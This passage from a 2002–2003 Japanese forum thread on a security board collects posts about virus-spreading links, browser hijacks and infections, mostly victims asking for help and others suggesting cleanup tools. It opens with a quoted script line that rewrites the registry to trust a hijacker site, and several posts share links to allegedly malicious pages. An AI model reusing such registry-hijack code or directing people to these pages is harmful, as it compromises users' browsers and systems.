Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\ie.search.msn.com","URLリンク(www.jpneweb.net)");
299:あぼーん
あぼーん
あぼーん
300:名無しさん@お腹いっぱい。
02/09/21 12:59
うわっ!このすれがそーじゃねーか!!
かかっちまった。
301:名無しさん@お腹いっぱい。
02/09/21 23:13
>>298
Shl.RegWriteでレジ書き換えか
脳トンあたまいいからなー
JSもう限界、VBSの面白いコード
作れる人いるかな、、、
302:名無しさん@お腹いっぱい。
02/09/22 22:00
次のURLが書かれたメール(一目でウィルスメールとおもえる文章内容)
がきました。ノートン入れているので安心して繋いでみることにすると、
パソコンがなにかをダウンロードしようとしていました。
下のサイトはなにのサイトでしょうか?技術を持っている人以外は
あけないようにしてください
URLリンク(210.99.218.5)
303:名無しさん@お腹いっぱい。
02/09/22 22:06
>>>302
...IEの韓国語サポートダウソになんの技術がいると?
304:名無しさん@お腹いっぱい。
02/09/22 22:22
>>303
ついていた文章はつぎのような文章だった。
ノートンがloveなんとかウィルスを検出した
Hi its me again, Lisa..... sorry my site was down, but i fixed it just for you.
I really want you to see me on my web cam live, i am usually online.
come check me out..............
-lisa
xoxo
305:名無しさん@お腹いっぱい。
02/09/22 22:25
>>304
そこ404なんだけど
306:
02/10/03 00:17
URLリンク(205.134.182.163)
が突然ポップアップで出るようになったんだが、ネットで検索してもほとんど情報出てこない。
誰かおしえて。
ヤフーとか見てるだけで怪しいサイトに行ってない時も突然出てくる。
一時間に一度ぐらい。
307:cheshire-cat ◆CATJR.v6
02/10/03 00:50
>>306
Ad-Awareでも使ったらどうっしょか。
308:
02/10/03 01:31
使ったんですが、これだけはどうしても発見できないんです。
エロサイトで仕込まれたのは間違いないと思われるんですが(鬱
309:cheshire-cat ◆CATJR.v6
02/10/03 01:48
>>308
Spybotとか使うって手もあると思いまするが。
何をインスコして、もしくは何をしてからそうなったんすか?
ありきたりな回答なんですが。
MeやXPならシステムの復元で、多分回復しまする。
310:308
02/10/03 14:16
Spybotでうじゃうじゃ怪しげなのが出てきました。
Ad-Awareで発見できないやつって結構多いんですね。
サンクス。
311:名無しさん@お腹いっぱい。
02/10/03 21:16
URLリンク(8506.teacup.com) ここにもよろしく
312:cheshire-cat ◆PhCATJR.v6
02/10/03 22:00
>>308
検出されたファイル名が知りたかった。。。。。
君が書き込めば、誰か新たな被害者が出た時にGoogle検索すると、このスレがヒットするのに。
もったいないなぁ。。。。。。
今度ははっきりと、「結果報告希望!」って書いてみまする。
313:名無しさん@お腹いっぱい。
02/10/04 14:08
URLリンク(www.need4xxx.net)
ソース中に警視庁
314:名無しさん@お腹いっぱい。
02/10/05 20:30
URLリンク(8112.teacup.com)
315:名無しさん@お腹いっぱい。
02/10/10 22:37
>>313って何?
316:あぼーん
あぼーん
あぼーん
317:名無しさん@お腹いっぱい。
02/10/11 18:15
URLリンク(www.zerotonin.cs.nu)
ウイルス?ガクガクブルブルです。
318:
02/10/12 06:33
>>316
警視庁にSENDMAILでいたずらメールが送信されちゃうんじゃない?
319:
02/10/14 20:30
URLリンク(www.need4xxx.net)
320:名無しさん@お腹いっぱい。
02/10/20 19:33
エログロワッショイ!!
\\ ブラクラワッショイ!! //
+ + \\ ウイルスワッショイ!!/+
+
. + /■\ /■\ /■\ +
(Φ_Φ∩(= ゚仝゚∩ (;´~`)
+ (( (つ ノ(つ 丿(つ つ )) +
ヽ ( ノ ( ヽノ ) ) )
(_)し' し(_) (_)_)
321:あぼーん
あぼーん
あぼーん
322:あぼーん
あぼーん
あぼーん
323:名無しさん@お腹いっぱい。
02/11/23 23:35
かんせーん
324:名無しさん@お腹いっぱい。
02/12/27 04:46
携帯に感染するウイルスってあるの?
ないよね・・・
ははは・・・
325:あぼーん
あぼーん
あぼーん
326:あぼーん
あぼーん
あぼーん
327:山崎渉
03/01/15 15:51
(^^)
328:名無しさん@お腹いっぱい。
03/01/31 22:58
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
z
329:砂
03/02/01 02:41
URLリンク(jbbs.shitaraba.com)
330:注意報
03/02/08 19:05
URLリンク(free7.webdos)
ここ開いたらVBS/Redof@Mに感染!
331:cheshire-cat ◆PhCATJR.v6
03/02/08 19:14
>>330
IEが古くて、Active X全開じゃなきゃ喰らわないよん。
332:cheshire-cat ◆PhCATJR.v6
03/02/08 19:16
修正。
Java VMのバージョンに依存。
333:あぼーん
あぼーん
あぼーん
334:名無しさん@お腹いっぱい。
03/02/16 15:09
最小化のボタンが0
最大化のボタンが2
閉じるボタンが r
体験版のソフトで調べたら感染してますって出たよ
直せないから隔離してますって言われたけど、怖くなったから
感染したファイル自分で削除してしまいました
削除しても、まったく意味ないことに気づいた今日この頃
もう一度感染して、ウイルス削除ソフト使えばよいのですか?
教えてくださいお願いします
335:名無しさん@お腹いっぱい。
03/02/16 17:34
>>334
ノートンインターネットセキュリティを買う
↓
OSを再インストールする
↓
ノートンをインストールする
これが普通だと思います
336:名無しさん@お腹いっぱい。
03/02/16 22:09
>>334
マジレス欲しければ質問スレで聞け。
337:名無しさん@お腹いっぱい。
03/02/17 00:50
質問スレをのぞいてみたら同じような症状の方がいて
その方にアドバイスしている方もいました
その方法を試してみようと思います
お騒がせしました
338:名無しさん@お腹いっぱい。
03/02/17 23:50
げは!
339:マジレスお願いします
03/02/19 01:26
URLリンク(www.geocities.co.jp)
(HD全消去サイトらしいです)
ネタだと思って見たらまじでハードディスクを初期化していますという画面が出て
慌てて閉じたんですがヤバイですかね?
どうすればいいでしょうか?
とりあえずウィルスチェックはしてみたのですが特に何も見つかりませんでした。
対処法を教えてください。
340:名無しさん@お腹いっぱい。
03/02/22 01:25
>>1
聞いただけで感染するわきゃないだろが。ヴォケが!
341:名無しさん@お腹いっぱい。
03/02/22 03:48
>>339
ばかですか?
きえるわけないでしょう
342:名無しさん@お腹いっぱい。
03/02/25 23:10
もっとすげーの貼ってくれ!
343:名無しさん@お腹いっぱい。
03/02/26 15:37
>>340
(´`c_,'` )プッ
344:
03/02/26 15:40
kusosure agenna!
345:あぼーん
あぼーん
あぼーん
346:名無しさん@お腹いっぱい。
03/03/02 16:33
>>345
つーか、hotmailは受信時にウイルスチェックするし。
Klezが送信者を偽装してるんだろ。
347:名無しさん@お腹いっぱい。
03/03/02 21:03
JAVAスクリプト使ってるんですです・・
>>339
348:あぼーん
あぼーん
あぼーん
349:名無しさん@お腹いっぱい。
03/03/09 03:01
あげる罠
350:名無しさん@お腹いっぱい。
03/03/10 09:19
age
351:名無しさん@お腹いっぱい。
03/03/13 14:42
qkeng@palette.plala.or.jp
/
352:山崎渉
03/04/17 12:24
(^^)
353:山崎渉
03/04/20 06:12
∧_∧
( ^^ )< ぬるぽ(^^)
354:pona-
03/04/22 21:16
メール送るだけで発動するウイルス教えてください
355:板TOPも読めないヤシは帰れ
03/04/22 21:57
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
356:名無しさん@お腹いっぱい。
03/04/25 13:51
au総合情報サイト
URLリンク(boat.zero.ad.jp)
ノートン先生が反応しまくり。
357:山崎渉
03/05/28 17:15
∧_∧
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎―◎ 山崎渉
358:(*^ヮ^*) ◆ZERO//1HPA
03/06/01 00:29
1・ケ
1・セ
J・エ
2・チ
2・シ
?・ネ
?・その他
359:名無しさん@お腹いっぱい。
03/06/02 08:36
あのー happy99とかいてあるものをクリックしたら
画面が真っ赤になってしまいました。。
スキャンしたら検出されなかったのですが。
感染しているでしょうか。。
360:名無しさん@お腹いっぱい。
03/06/03 21:07
このサイト最悪。ウイルスに犯されてる?
URLリンク(jbbs.shitaraba.com)
361:あぼーん
あぼーん
あぼーん
362:cheshire-cat ◆CATBCJABLA
03/06/03 21:11
>>359
使ってるアンチウイルスソフトぐらいは書けば、誰かがログファイルの見方とか教えてくれる予感。
あとは関連って事で、これ。
「あるホームページを見ると、「ウイルス発見→隔離」みたいなメッセージが出る」
URLリンク(members.tripod.co.jp)
363:名無しさん@お腹いっぱい。
03/06/04 01:18
happy99.exeか?
見た事あるが・・いかにもウイルスっぽい名前じゃん。
どうしてよく分かりもしないファイルを安易に実行するのかなあ・・。
まるで何でもすぐに口に入れてしまう触覚の発達してない赤ん坊みたいだな(藁
364:名無しさん@お腹いっぱい。
03/06/08 15:13
>>360
見るだけなら無問題
365:名無しさん@お腹いっぱい。
03/06/08 20:32
URLリンク(www2.strangeworld.org)
上記urlをコピペしてブラクラチェッカーにかけようとしたらギコナビのプレビュー機能が働いちゃって
前に参照した画像がちらっと見えたと思ったらノートン先生の警告。
Js.Torojan.WindowBombだって。
まだ感染場所は検索してないけど、以前もいつ感染したかわからないウィルス(Trojanなんとか)が
あって、感染場所はギコナビフォルダとtemporaly internetfilesだった。
そのときのtempfileのurlにstrangeworldとかsahraとかいう文字列があった。
たしかノートン先生がVBSのソースが書かれているだけで警報鳴らしまくってた頃、tempofileは実
行できないから気にしなくてよいとか書いてあったような気がするので該当ファイルを削除して終わりにしたんだけど・・・
正直トロイが仕掛けられたんじゃないかと不安になる。
jpg見ただけで感染するウィルスってあるんでしょうか?
366:名無しさん@お腹いっぱい。
03/06/08 20:36
>>365
ある。
367:名無しさん@お腹いっぱい。
03/06/08 20:38
>>366
まじっすか。じゃあ早速システムスキャンを。
一時間以上かかるのでまんどくさいが。
368:名無しさん@お腹いっぱい。
03/06/08 20:42
>>367
誰も>>365のURLがそれだとは言っていない。
369:名無しさん@お腹いっぱい。
03/06/08 20:43
ちなみにこの板では鑑定はやらない。
370:名無しさん@お腹いっぱい。
03/06/08 21:22
この板では鑑定はやらないので、鑑定依頼は、
ラウンジの
勇気がなくて見られない画像解説スレ Part373
スレリンク(entrance板)l50へ。
ウィルスに関する質問は、
☆ウィルス情報&質問 総合スレッド☆part10
スレリンク(sec板)l50でどうぞ。
371:365
03/06/08 22:39
今チェック終わりました。
スレ違いスマソ。
372:名無しさん@お腹いっぱい。
03/07/06 14:46
あげ
373:名無しさん@お腹いっぱい。
03/07/06 15:12
スレのタイトルと>>1さんの発言内容が一致してないように見える
のは私だけでしょうか。
374:あぼーん
あぼーん
あぼーん
375:あぼーん
あぼーん
あぼーん
376:あぼーん
あぼーん
あぼーん
377:しぽーん
03/07/06 20:08
しぽーん
378:おぽーん
03/07/07 06:32
おぽーん
379:_
03/07/07 07:20
URLリンク(homepage.mac.com)
380:名無しさん@お腹いっぱい。
03/07/07 12:02
URLリンク(ime.nu)
焼きなす、最強だお。
381:ぴの
03/07/07 12:13
あぼーん
382:名無しさん@お腹いっぱい。
03/07/07 13:17
再起動するたびに次に立ち上げるときに必ずHPが
URLリンク(revolto.da.ru)
に設定されていてPCがクラッシュして何が原因なのかさっぱりわからないんですけど…(鬱
スパイウエアとウィルスはすべて排除してはいるんですが…
383:名無しさん@お腹いっぱい。
03/07/07 15:12
( ´_ゝ`)フーン
384:名無しさん@お腹いっぱい。
03/07/07 17:58
>>382
FWは?アンチウイルス最新定義でやってないでしょ。
385:名無しさん@お腹いっぱい。
03/07/08 00:01
URLリンク(f12.aaacafe.ne.jp)感染するよ・・・・
386:名無しさん@お腹いっぱい。
03/07/08 01:16
>>385
せめてhは消そうね。
387:名無しさん@お腹いっぱい。
03/07/08 06:20
URLリンク(www.boushi.or.jp)
これってどうなん?
388:名無しさん@お腹いっぱい。
03/07/08 07:28
やっぱミニにタコでしょ!田代本人をもりあげよう!
スーフリを上回る今年最大の祭り!!
田代まさしを、ベストジーニストにしよう!!
□ベストジーニスト賞 2003年□
現在、「田代まさし」27位。
マーシー・・・( ̄_ ̄)
◎投票結果
URLリンク(www.best-jeans.com)
◎投票フォーム(一人一回 制限)
URLリンク(www.best-jeans.com)
原則、"田代まさし"で投票。
*他のスレにコピペをよろしくお願いします
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
早稲田集団レイプ事件のまとめ 完全版
URLリンク(01pu_de_waseda.tripod.com)<)
389:名無しさん@お腹いっぱい。
03/07/09 07:48
URLリンク(members5.cool.ne.jp)
ここは大丈夫?
390:(;´Д`)
03/07/09 08:16
(;´Д`)おチンチンがカチカチでつ
URLリンク(homepage3.nifty.com)
391:名無しさん@お腹いっぱい。
03/07/10 14:55
392:_
03/07/10 15:13
URLリンク(homepage.mac.com)
393:名無しさん@お腹いっぱい。
03/07/12 14:23
URLリンク(ime.nu)
VBS_REDLOF.A
394:名無しさん@お腹いっぱい。
03/07/12 14:27
>>393
感染サイト?リンクはhとか抜いとこうよ
REDLOFってひょんといるんだよね
395:あぼーん
あぼーん
あぼーん
396:名無しさん@お腹いっぱい。
03/07/12 20:14
>>395
他人のメアドだろ?
397:山崎 渉
03/07/15 11:06
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
398:名無しさん@お腹いっぱい。
03/07/23 01:20
__∧_∧_
|( ^^ )| <ぬるぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~|
~ ̄ ̄ ̄ ̄
399:名無しさん@お腹いっぱい。
03/07/23 10:03
レベルの低い質問ですみません。
Win98、OutlookExpress5でウィルスメールを
カスタマーセンターの指示通り、転送しようとしたら
自動開封やプレビューを切ってあったにもかかわらず
開封され、KLEZ_Hに感染してしまいました。
OutlookExpress5では、転送しようとすると
開封してしまうのでしょうか?
また、開封せずに転送する方法はないのでしょうか?
どうぞよろしくお願いします。
400:名無しさん@お腹いっぱい。
03/07/23 18:42
(σ・∀・)σ400ゲッツ!!
401:名無しさん@お腹いっぱい。
03/07/23 18:47
>>399
スレリンク(sec板:651-656番)n
402:名無しさん@お腹いっぱい。
03/07/23 18:52
>>399
OEの操作云々言う前にAV入れろ。
403:名無しさん@お腹いっぱい。
03/07/25 15:35
h-y@cac-net.ne.jp
404:名無しさん@お腹いっぱい。
03/07/25 23:13
このスレをクリックする時ドキドキした。
405:名無しさん@お腹いっぱい。
03/07/25 23:19
>>404
そんなことより糞スレ上げないで
406:名無しさん@お腹いっぱい。
03/07/27 10:02
age
407:ぼるじょあ ◆yBEncckFOU
03/08/02 04:54
∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎―――◎ 山崎渉&ぼるじょあ
408:名無しさん@お腹いっぱい。
03/08/13 04:07
軽くて使いやすいうpろだ 800MBまで
URLリンク(sekainokatasumi.ath.cx)
409:山崎 渉
03/08/15 22:37
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
410:名無しさん@お腹いっぱい。
03/08/24 01:35
保守あげ
411:名無しさん@お腹いっぱい。
03/08/30 00:45
URLリンク(lotasproductions.com)
不正な処理でブラウザ落ちてから、デスクトップに
malware156(数字は可変)のアイコンが出来ます。
そのままでは、削除できません。
いったんOSを再起動すると、削除できます。
これって、ウイルス?
412:名無しさん@お腹いっぱい。
03/08/30 11:24
>>1ほらよ
URLリンク(mios.20m.com)
413:名無しさん@お腹いっぱい。
03/09/03 22:00
↓このページは安全ですが自己責任でクリックしてください。
URLリンク(www.viplegal.com)
414:ここは?
03/09/04 23:56
URLリンク(www.victim.com)
415:名無しさん@お腹いっぱい。
03/09/05 19:27
URLリンク(www2.strangeworld.org)
URLリンク(www2.strangeworld.org)
感染しまつた
416:名無しさん@お腹いっぱい。
03/09/07 01:51
dhfdg
417:(;´∀`)<ぬるぽ
03/09/08 10:46
URLリンク(easyweb.easynet.co.uk)
これ、そんなにすごいの?
418:名無しさん@お腹いっぱい。
03/09/09 00:29
日付変わって
昨日は開いただけでfusianasanカキコをしてしまうトラップが大流行だったようで。
419:名無しさん@お腹いっぱい。
03/09/09 19:01
URLリンク(easyweb.easynet.co.uk)
420:名無しさん@お腹いっぱい。
03/09/24 00:26
>>399
それ以前にOE使うのやめろ
421:名無しさん@お腹いっぱい。
03/10/22 23:23
URLリンク(66.7.65.90)
これとある掲示板にあって、開くつもりは本当に全く無いのに間違えて開いちゃって
PCがおかしくなりました。ウイルスなんでしょうか?
症状としては、IEをWクリすると勝手にエロサイトに接続するように設定が変わってしまい
いくら直してもPCを起動すればまたエロサイトに接続するように設定されてしまいます
↑のサイトのせいかはわかりませんが、↑のサイトを開いてPCが変になってから
ウイルスバスターの体験版をDLして検索したら、TROJ_WINTRIM.Aとかいうウイルスが大量に
見つかりました。このウイルスの駆除自体は終わったんですが、未だに強制エロサイトの
設定は改善されていません。
PCのことは初心者なので、どうか直し方を教えていただきたいのですが・・。
422:(・3・)
03/10/22 23:55
age
423:名無しさん@お腹いっぱい。
03/10/22 23:56
>>422
(・3・) アルェー ボクの顔勝手に使わないでYO
424:もう
03/10/22 23:59
421 諦めて再インストールじゃy
425:名無しさん@お腹いっぱい。
03/10/23 00:04
マルチはパソコンを窓から投げ捨てろ
426:あきお
03/10/23 00:15
417
URLリンク(easyweb.easynet.co.uk)
これ開くとどうなるの?
427:名無しさん@お腹いっぱい。
03/10/23 21:19
はじめまして。
URLリンク(www2.strangeworld.org)
は 何ですか?
友達が開いちゃって・・・
教えてください。
428:oおしえてよん
03/10/23 23:13
下記page開いたらどないなるか教えて教えてくださいませ。
URLリンク(easyweb.easynet.co.uk)
URLリンク(66.7.65.90)
URLリンク(easyweb.easynet.co.uk)
URLリンク(www2.strangeworld.org)
URLリンク(easyweb.easynet.co.uk)
429:oおしえてよん
03/10/23 23:22
ぜひ教えて下さいませ。
430:名無しさん@お腹いっぱい。
03/10/26 18:41
ブラクラ・プリクラ
431:アホ
03/10/26 18:52
私も>>422
さんと全く同じ症状です。
私が感染したのは、ちょっとURLが違うのですが、
URLリンク(66.7.65.90)
よく似ているので同じタイプのウィルスと思われます。
昨日、スレリンク(sec板)l50
のスレでも質問しましたが、
解決できないので、こちらでも質問させていただきます。
具体的には、PCいろいろな所に
「RAW SEX」というアプリケーションが勝手に作られている。
IEを起動するとエロページにアクセスされる。
「RAW SEX」を削除すると、一応インターネットが使えるようになるが、
次に起動するとまた同じ症状、という具合です。
432:名無しさん@お腹いっぱい。
03/10/26 19:31
>422 名前: (・3・) 投稿日: 03/10/22 23:55
>age
>422 名前: (・3・) 投稿日: 03/10/22 23:55
>age
>422 名前: (・3・) 投稿日: 03/10/22 23:55
>age
>422 名前: (・3・) 投稿日: 03/10/22 23:55
>age
433:名無しさん@お腹いっぱい。
03/10/26 21:26
ブラクラってなによ?
434:名無しさん@お腹いっぱい。
03/10/26 21:32
ボンクラってなによ?
435:アホ
03/10/26 22:18
431のアホですが、
>>431
のレス訂正
私も>>422
さんと全く同じ症状です。
ではなく
私も>>421
さんと全く同じ症状です。
でした。
だれかアホの俺の相談にのってください。たのんます
436:名無しさん@お腹いっぱい。
03/10/27 13:18
>>435
SPYBOT入れてスキャンしてみなされ。
なお、定義ファイルを更新しておくこと。
437:名無しさん@お腹いっぱい。
03/10/31 11:44
>>434
シマンテックのホームページでレジストリのいじり方まで教えてくれるから
行ってみれば?
438:アホ
03/10/31 11:53
了解しました
439:名無しさん@お腹いっぱい。
03/11/01 11:36
Internet Explorer開いたら、いきなりアダルトページ。
設定しなおしても、再起動するとアダルトページ。
ウイルスチェックしても1つ見つからない。絶対感染してますよね?
440:名無しさん@お腹いっぱい。
03/11/01 11:37
>>439
この辺使っとけば?
URLリンク(download.ascii.jp)
441:名無しさん@お腹いっぱい。
03/11/02 11:56
>>439
もしかしてTHE HUN'S イエローなんたらって奴ですか?
442:名無しさん@お腹いっぱい。
03/11/02 20:05
URLリンク(www.browsercleanser.com)
↑このページはどうなんでしょう??
ブラウザなんたらって事はIPが抜かれるんでしょうか・・・。
また、クリックしてしまった場合はどのようにすれば良いか。。。
何で人のPCでクリックしちゃうんだよオカン・・・_| ̄|○
443:名無しさん@お腹いっぱい。
03/11/02 20:07
鑑定依頼はラウンジの
勇気がなくて見られない画像解説スレPart470
スレリンク(entrance板)l50
でどうぞ。